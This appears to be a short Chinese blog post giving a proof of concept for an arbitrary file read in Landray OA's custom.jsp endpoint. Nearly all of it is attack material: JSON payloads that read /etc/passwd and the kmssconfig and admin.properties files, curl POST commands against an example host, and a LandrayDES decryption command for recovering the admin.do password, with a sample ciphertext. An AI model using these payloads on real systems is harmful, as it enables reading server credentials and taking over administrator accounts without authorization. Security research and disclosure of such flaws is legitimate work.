编写进度
蓝凌OA custom.jsp页面任意文件读取
- URI:
/sys/ui/extend/varkind/custom.jsp - payload:
var={"body":{"file":"file:///etc/passwd"}} var={"body":{"file":"/WEB-INF/KmssConfig/kmssconfig.properties"}} var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}
POC
- 查看kmssconfig配置文件
curl -X POST "http://ekpoa.example.com:8088/sys/ui/extend/varkind/custom.jsp" -d 'var={"body":{"file":"/WEB-INF/KmssConfig/kmssconfig.properties"}}'
- 查看
/admin.do管理员后台密码curl -X POST "http://ekpoa.example.com:8088/sys/ui/extend/varkind/custom.jsp" -d 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
解密工具 LandrayDES
java -jar LandrayDES-0.0.1-SNAPSHOT-jar-with-dependencies.jar Decrypt admin.do S11E7bclfCnWEz/\JLVTdUw==参考
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 askding@qq.com
